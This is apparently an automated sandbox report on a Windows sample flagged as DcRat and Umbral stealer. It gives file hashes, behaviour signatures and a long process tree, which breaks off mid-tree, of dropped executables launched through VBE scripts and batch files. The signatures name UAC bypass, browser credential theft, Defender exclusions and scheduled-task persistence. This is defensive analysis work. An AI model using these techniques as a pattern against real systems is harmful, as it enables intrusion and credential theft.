Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-08-2024 01:05

General

  • Target

    294003b3626890da222c7aeb34f7ac71cec614026c686fd88df269cc175a0e8c.exe

  • Size

    3.4MB

  • MD5

    392fcfb7445ce64079d2de971877520e

  • SHA1

    68b4ab6a88385348fb1808286ac3586c15ef73ef

  • SHA256

    294003b3626890da222c7aeb34f7ac71cec614026c686fd88df269cc175a0e8c

  • SHA512

    87ee7c6b2c6aa96779ab1c9c38e9ebb8f4c589681af31b164c261d84e86eac6e3e7b62beea1c37db912c2d49cbe28c28f1043f69d0b440328b52a482fc520f1c

  • SSDEEP

    98304:h/tCnHVGIBfSIJ7tCHkurtT2zFhuR83VYpBSUKn:JtCHVgG7EttEuR8WpBSUKn

Malware Config

Signatures

  • DcRat 57 IoCs

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detect Umbral payload 2 IoCs
  • Process spawned unexpected child process 54 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • UAC bypass 3 TTPs 45 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • DCRat payload 3 IoCs

    Detects payload of DCRat, commonly dropped by NSIS installers.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 46 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 44 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks whether UAC is enabled 1 TTPs 30 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 42 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 28 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 56 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 45 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\294003b3626890da222c7aeb34f7ac71cec614026c686fd88df269cc175a0e8c.exe
    "C:\Users\Admin\AppData\Local\Temp\294003b3626890da222c7aeb34f7ac71cec614026c686fd88df269cc175a0e8c.exe"
    1⤵
    • DcRat
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Users\Admin\AppData\Local\Temp\loader0.exe
      "C:\Users\Admin\AppData\Local\Temp\loader0.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:4032
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\reviewCrt\jVfhzQMFI0iTNziih7b.vbe"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1460
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\reviewCrt\tYuCM.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2284
          • C:\reviewCrt\AgentDriversession.exe
            "C:\reviewCrt\AgentDriversession.exe"
            5⤵
            • UAC bypass
            • Checks computer location settings
            • Executes dropped EXE
            • Checks whether UAC is enabled
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • Drops file in Windows directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            • System policy modification
            PID:2624
            • C:\Recovery\WindowsRE\fontdrvhost.exe
              "C:\Recovery\WindowsRE\fontdrvhost.exe"
              6⤵
              • UAC bypass
              • Checks computer location settings
              • Executes dropped EXE
              • Checks whether UAC is enabled
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              • System policy modification
              PID:280
              • C:\Windows\System32\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ecb84d2c-4828-4fe7-8887-4fde89ae9bab.vbs"
                7⤵
                  PID:3216
                  • C:\Recovery\WindowsRE\fontdrvhost.exe
                    C:\Recovery\WindowsRE\fontdrvhost.exe
                    8⤵
                    • UAC bypass
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Checks whether UAC is enabled
                    • Modifies registry class
                    • System policy modification
                    PID:2412
                    • C:\Windows\System32\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7933246c-48a1-4f21-9465-7bce9accbb44.vbs"
                      9⤵
                        PID:4392
                        • C:\Recovery\WindowsRE\fontdrvhost.exe
                          C:\Recovery\WindowsRE\fontdrvhost.exe
                          10⤵
                          • UAC bypass
                          • Checks computer location settings
                          • Executes dropped EXE
                          • Checks whether UAC is enabled
                          • Modifies registry class
                          • System policy modification
                          PID:3700
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\74465fe1-56de-4923-a430-12b4ec8a3fd4.vbs"
                            11⤵
                              PID:976
                              • C:\Recovery\WindowsRE\fontdrvhost.exe
                                C:\Recovery\WindowsRE\fontdrvhost.exe
                                12⤵
                                • UAC bypass
                                • Checks computer location settings
                                • Executes dropped EXE
                                • Checks whether UAC is enabled
                                • Modifies registry class
                                • System policy modification
                                PID:4688
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56f43f13-98bb-4a10-a93e-7fb190e41af7.vbs"
                                  13⤵
                                    PID:2924
                                    • C:\Recovery\WindowsRE\fontdrvhost.exe
                                      C:\Recovery\WindowsRE\fontdrvhost.exe
                                      14⤵
                                      • UAC bypass
                                      • Checks computer location settings
                                      • Executes dropped EXE
                                      • Checks whether UAC is enabled
                                      • Modifies registry class
                                      • System policy modification
                                      PID:4860
                                      • C:\Windows\System32\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\148a19f8-6a8e-4c25-a0ee-9a55aa19818f.vbs"
                                        15⤵
                                          PID:268
                                          • C:\Recovery\WindowsRE\fontdrvhost.exe
                                            C:\Recovery\WindowsRE\fontdrvhost.exe
                                            16⤵
                                            • UAC bypass
                                            • Checks computer location settings
                                            • Executes dropped EXE
                                            • Checks whether UAC is enabled
                                            • Modifies registry class
                                            • System policy modification
                                            PID:4052
                                            • C:\Windows\System32\WScript.exe
                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3560f811-580b-4d11-91cb-174349a7922f.vbs"
                                              17⤵
                                                PID:976
                                                • C:\Recovery\WindowsRE\fontdrvhost.exe
                                                  C:\Recovery\WindowsRE\fontdrvhost.exe
                                                  18⤵
                                                  • UAC bypass
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • Checks whether UAC is enabled
                                                  • Modifies registry class
                                                  • System policy modification
                                                  PID:1760
                                                  • C:\Windows\System32\WScript.exe
                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\53cb96f9-25dd-4c91-a6f3-7ddfb685d3bf.vbs"
                                                    19⤵
                                                      PID:1404
                                                      • C:\Recovery\WindowsRE\fontdrvhost.exe
                                                        C:\Recovery\WindowsRE\fontdrvhost.exe
                                                        20⤵
                                                        • UAC bypass
                                                        • Checks computer location settings
                                                        • Executes dropped EXE
                                                        • Checks whether UAC is enabled
                                                        • Modifies registry class
                                                        • System policy modification
                                                        PID:1084
                                                        • C:\Windows\System32\WScript.exe
                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b7546401-e0c4-4035-af56-9e8a6b677a70.vbs"
                                                          21⤵
                                                            PID:3704
                                                            • C:\Recovery\WindowsRE\fontdrvhost.exe
                                                              C:\Recovery\WindowsRE\fontdrvhost.exe
                                                              22⤵
                                                              • UAC bypass
                                                              • Checks computer location settings
                                                              • Executes dropped EXE
                                                              • Checks whether UAC is enabled
                                                              • Modifies registry class
                                                              • System policy modification
                                                              PID:1536
                                                              • C:\Windows\System32\WScript.exe
                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\45f54fd2-e789-41c5-8264-9856d3b456e0.vbs"
                                                                23⤵
                                                                  PID:864
                                                                  • C:\Recovery\WindowsRE\fontdrvhost.exe
                                                                    C:\Recovery\WindowsRE\fontdrvhost.exe
                                                                    24⤵
                                                                    • UAC bypass
                                                                    • Checks computer location settings
                                                                    • Executes dropped EXE
                                                                    • Checks whether UAC is enabled
                                                                    • Modifies registry class
                                                                    • System policy modification
                                                                    PID:3044
                                                                    • C:\Windows\System32\WScript.exe
                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e738894d-7b31-44ec-bc5b-774ca41a0664.vbs"
                                                                      25⤵
                                                                        PID:3528
                                                                        • C:\Recovery\WindowsRE\fontdrvhost.exe
                                                                          C:\Recovery\WindowsRE\fontdrvhost.exe
                                                                          26⤵
                                                                          • UAC bypass
                                                                          • Checks computer location settings
                                                                          • Executes dropped EXE
                                                                          • Checks whether UAC is enabled
                                                                          • Modifies registry class
                                                                          • System policy modification
                                                                          PID:2504
                                                                          • C:\Windows\System32\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\39b2b7d5-6c39-43be-a44a-76732f5562d2.vbs"
                                                                            27⤵
                                                                              PID:3152
                                                                              • C:\Recovery\WindowsRE\fontdrvhost.exe
                                                                                C:\Recovery\WindowsRE\fontdrvhost.exe
                                                                                28⤵
                                                                                • UAC bypass
                                                                                • Checks computer location settings
                                                                                • Executes dropped EXE
                                                                                • Checks whether UAC is enabled
                                                                                • Modifies registry class
                                                                                • System policy modification
                                                                                PID:1156
                                                                                • C:\Windows\System32\WScript.exe
                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bb3f85a1-e44a-4ec7-ba5a-7ca66aa695c8.vbs"
                                                                                  29⤵
                                                                                    PID:1576
                                                                                    • C:\Recovery\WindowsRE\fontdrvhost.exe
                                                                                      C:\Recovery\WindowsRE\fontdrvhost.exe
                                                                                      30⤵
                                                                                      • UAC bypass
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • Checks whether UAC is enabled
                                                                                      • Modifies registry class
                                                                                      • System policy modification
                                                                                      PID:4312
                                                                                      • C:\Windows\System32\WScript.exe
                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1c2f9b18-7670-4708-8394-823d9a0150e8.vbs"
                                                                                        31⤵
                                                                                          PID:1716
                                                                                          • C:\Recovery\WindowsRE\fontdrvhost.exe
                                                                                            C:\Recovery\WindowsRE\fontdrvhost.exe
                                                                                            32⤵
                                                                                            • UAC bypass
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Checks whether UAC is enabled
                                                                                            • Modifies registry class
                                                                                            • System policy modification
                                                                                            PID:292
                                                                                            • C:\Windows\System32\WScript.exe
                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\01961df5-c348-47f9-b2ef-df61b7e48c60.vbs"
                                                                                              33⤵
                                                                                                PID:3248
                                                                                              • C:\Windows\System32\WScript.exe
                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\a252ccdd-173e-4189-8183-1cbd8c69922d.vbs"
                                                                                                33⤵
                                                                                                  PID:1980
                                                                                                • C:\Users\Admin\AppData\Local\Temp\M1KUXQ4BATSJ6ND.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\M1KUXQ4BATSJ6ND.exe"
                                                                                                  33⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Modifies registry class
                                                                                                  PID:4664
                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                    "C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"
                                                                                                    34⤵
                                                                                                    • Checks computer location settings
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:3788
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "
                                                                                                      35⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4208
                                                                                                      • C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe
                                                                                                        "C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"
                                                                                                        36⤵
                                                                                                          PID:2744
                                                                                              • C:\Windows\System32\WScript.exe
                                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\79f87e9a-31cc-40bd-aa79-b6c4e5b4697e.vbs"
                                                                                                31⤵
                                                                                                  PID:5032
                                                                                                • C:\Users\Admin\AppData\Local\Temp\76F517HLLQJNX8J.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\76F517HLLQJNX8J.exe"
                                                                                                  31⤵
                                                                                                  • Checks computer location settings
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Modifies registry class
                                                                                                  PID:4912
                                                                                                  • C:\Windows\SysWOW64\WScript.exe
                                                                                                    "C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"
                                                                                                    32⤵
                                                                                                    • Checks computer location settings
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:5040
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "
                                                                                                      33⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:1488
                                                                                                      • C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe
                                                                                                        "C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"
                                                                                                        34⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:428
                                                                                            • C:\Windows\System32\WScript.exe
                                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5ec1b657-f905-4722-b992-57cf1742f0bf.vbs"
                                                                                              29⤵
                                                                                                PID:2364
                                                                                              • C:\Users\Admin\AppData\Local\Temp\GR5AOW0DWRGLQUU.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\GR5AOW0DWRGLQUU.exe"
                                                                                                29⤵
                                                                                                • Checks computer location settings
                                                                                                • Executes dropped EXE
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                • Modifies registry class
                                                                                                PID:2108
                                                                                                • C:\Windows\SysWOW64\WScript.exe
                                                                                                  "C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"
                                                                                                  30⤵
                                                                                                  • Checks computer location settings
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:268
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "
                                                                                                    31⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:2556
                                                                                                    • C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe
                                                                                                      "C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"
                                                                                                      32⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:2972
                                                                                          • C:\Windows\System32\WScript.exe
                                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\625a94cb-badd-4986-9a0b-64f87e9878d6.vbs"
                                                                                            27⤵
                                                                                              PID:2924
                                                                                            • C:\Users\Admin\AppData\Local\Temp\QRQI8S6GDMYO1QW.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\QRQI8S6GDMYO1QW.exe"
                                                                                              27⤵
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Modifies registry class
                                                                                              PID:2876
                                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                                "C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"
                                                                                                28⤵
                                                                                                • Checks computer location settings
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:1112
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "
                                                                                                  29⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:1724
                                                                                                  • C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe
                                                                                                    "C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"
                                                                                                    30⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:3160
                                                                                        • C:\Windows\System32\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1423a847-0820-42d9-9c64-6d9b6c87b37d.vbs"
                                                                                          25⤵
                                                                                            PID:1228
                                                                                          • C:\Users\Admin\AppData\Local\Temp\B2LU7X1PKNMSP2L.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\B2LU7X1PKNMSP2L.exe"
                                                                                            25⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Modifies registry class
                                                                                            PID:4500
                                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                                              "C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"
                                                                                              26⤵
                                                                                              • Checks computer location settings
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:432
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "
                                                                                                27⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:4296
                                                                                                • C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe
                                                                                                  "C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"
                                                                                                  28⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4048
                                                                                      • C:\Windows\System32\WScript.exe
                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6830ee7e-04c3-4106-b912-5c85065c83e7.vbs"
                                                                                        23⤵
                                                                                          PID:2468
                                                                                        • C:\Users\Admin\AppData\Local\Temp\XBF2UG6CLGSYIL9.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\XBF2UG6CLGSYIL9.exe"
                                                                                          23⤵
                                                                                          • Checks computer location settings
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          • Modifies registry class
                                                                                          PID:1828
                                                                                          • C:\Windows\SysWOW64\WScript.exe
                                                                                            "C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"
                                                                                            24⤵
                                                                                            • Checks computer location settings
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:4768
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "
                                                                                              25⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:4916
                                                                                              • C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe
                                                                                                "C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"
                                                                                                26⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3524
                                                                                    • C:\Windows\System32\WScript.exe
                                                                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\22eea994-e5e3-4545-a15e-9dfc6caacbf7.vbs"
                                                                                      21⤵
                                                                                        PID:4336
                                                                                      • C:\Users\Admin\AppData\Local\Temp\ZSHLH2SK21UP03V.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\ZSHLH2SK21UP03V.exe"
                                                                                        21⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Modifies registry class
                                                                                        PID:1900
                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"
                                                                                          22⤵
                                                                                          • Checks computer location settings
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4240
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "
                                                                                            23⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:4232
                                                                                            • C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe
                                                                                              "C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"
                                                                                              24⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4332
                                                                                  • C:\Windows\System32\WScript.exe
                                                                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9143844c-38c8-4919-ac51-b64493e1ddda.vbs"
                                                                                    19⤵
                                                                                      PID:4320
                                                                                    • C:\Users\Admin\AppData\Local\Temp\V5T6WFZ2F3KZ61X.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\V5T6WFZ2F3KZ61X.exe"
                                                                                      19⤵
                                                                                      • Checks computer location settings
                                                                                      • Executes dropped EXE
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Modifies registry class
                                                                                      PID:2352
                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                        "C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"
                                                                                        20⤵
                                                                                        • Checks computer location settings
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:864
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "
                                                                                          21⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:736
                                                                                          • C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe
                                                                                            "C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"
                                                                                            22⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:1492
                                                                                • C:\Windows\System32\WScript.exe
                                                                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\33bca6c1-8617-47cd-9ca6-ec507be9a16d.vbs"
                                                                                  17⤵
                                                                                    PID:3908
                                                                                  • C:\Users\Admin\AppData\Local\Temp\4O8LO4J26Z65VZS.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\4O8LO4J26Z65VZS.exe"
                                                                                    17⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    • Modifies registry class
                                                                                    PID:4424
                                                                                    • C:\Windows\SysWOW64\WScript.exe
                                                                                      "C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"
                                                                                      18⤵
                                                                                      • Checks computer location settings
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:4832
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "
                                                                                        19⤵
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        PID:3588
                                                                                        • C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe
                                                                                          "C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"
                                                                                          20⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4544
                                                                              • C:\Windows\System32\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\20d14fa6-c2ae-4e34-93b6-3f41a10928f2.vbs"
                                                                                15⤵
                                                                                  PID:2916
                                                                            • C:\Windows\System32\WScript.exe
                                                                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\893335b7-472b-4bc9-a83e-78b0a6d7e3bf.vbs"
                                                                              13⤵
                                                                                PID:3512
                                                                          • C:\Windows\System32\WScript.exe
                                                                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\4e279c72-e721-4764-889a-cd12bc30bec5.vbs"
                                                                            11⤵
                                                                              PID:3756
                                                                            • C:\Users\Admin\AppData\Local\Temp\F3WZQ5M145QNG7A.exe
                                                                              "C:\Users\Admin\AppData\Local\Temp\F3WZQ5M145QNG7A.exe"
                                                                              11⤵
                                                                              • Checks computer location settings
                                                                              • Executes dropped EXE
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Modifies registry class
                                                                              PID:1716
                                                                              • C:\Windows\SysWOW64\WScript.exe
                                                                                "C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"
                                                                                12⤵
                                                                                • Checks computer location settings
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:2776
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "
                                                                                  13⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:4964
                                                                                  • C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe
                                                                                    "C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"
                                                                                    14⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:272
                                                                        • C:\Windows\System32\WScript.exe
                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7d6bd5e7-4329-4242-90d6-183eee666309.vbs"
                                                                          9⤵
                                                                            PID:2816
                                                                          • C:\Users\Admin\AppData\Local\Temp\O2T0MZ0JE83GUUB.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\O2T0MZ0JE83GUUB.exe"
                                                                            9⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Modifies registry class
                                                                            PID:4920
                                                                            • C:\Windows\SysWOW64\WScript.exe
                                                                              "C:\Windows\System32\WScript.exe" "C:\PortsurrogateWinhostdhcp\ya0aIw.vbe"
                                                                              10⤵
                                                                              • Checks computer location settings
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:4660
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c ""C:\PortsurrogateWinhostdhcp\AW1Fe6Q61HGStQsO0.bat" "
                                                                                11⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:4548
                                                                                • C:\PortsurrogateWinhostdhcp\WebReviewWinSvc.exe
                                                                                  "C:\PortsurrogateWinhostdhcp/WebReviewWinSvc.exe"
                                                                                  12⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:1644
                                                                      • C:\Windows\System32\WScript.exe
                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3f5b0daa-623d-4d3d-9b5c-defcb07b78c9.vbs"
                                                                        7⤵
                                                                          PID:3624
                                                                        • C:\Users\Admin\AppData\Local\Temp\Y44R22IDAZA43DA.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\Y44R22IDAZA43DA.exe"
                                                                          7⤵
                                                                          • Checks computer location settings
                                                                          • Executes dropped EXE
